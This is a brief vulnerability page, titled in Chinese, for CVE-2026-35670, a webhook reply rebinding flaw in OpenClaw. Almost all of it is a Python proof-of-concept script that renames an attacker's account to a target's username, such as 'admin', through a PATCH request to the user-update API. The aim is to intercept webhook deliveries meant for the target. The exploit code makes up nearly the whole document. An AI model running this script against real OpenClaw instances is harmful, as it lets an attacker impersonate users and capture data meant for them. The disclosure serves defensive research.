CVE-2026-35670 OpenClaw Webhook回复重绑定漏洞

# Conceptual PoC for CVE-2026-35670 # Demonstrating how changing a username can intercept a webhook reply import requests def exploit_webhook_rebinding(target_username, attacker_session): """ Attacker changes their username to match the target to intercept the webhook payload. """ # 1. Change attacker's username to the target's username rename_url = "https://openclaw-instance/api/v1/user/update" headers = {"Authorization": f"Bearer {attacker_session}"} data = {"username": target_username} response = requests.patch(rename_url, headers=headers, json=data) if response.status_code == 200: print(f"[+] Username successfully changed to '{target_username}'") print("[+] Waiting for webhook delivery...") # If a webhook is triggered for 'target_username' now, # the server routes it to the attacker's account. else: print("[-] Failed to change username") # Usage # exploit_webhook_rebinding("admin", "attacker_stolen_token")